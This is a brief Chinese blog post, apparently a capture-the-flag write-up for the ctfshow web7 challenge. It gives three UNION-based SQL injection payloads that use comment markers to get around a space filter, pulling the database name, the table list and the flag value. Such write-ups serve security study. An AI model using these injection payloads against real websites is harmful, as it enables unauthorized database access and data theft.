ctfshow--web7 sql注入空格过滤

?id=10//union//select//1,database(),3//%23查看库名
image
查看表名
-1/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),3/**/%23
image
查看flag表下的flag字段
-1/**/union/**/select/**/1,(select/**/flag/**/from/**/flag),3/**/%23
image

posted @ 2024-04-03 23:44  WSssSW  阅读(1)  评论(0编辑  收藏  举报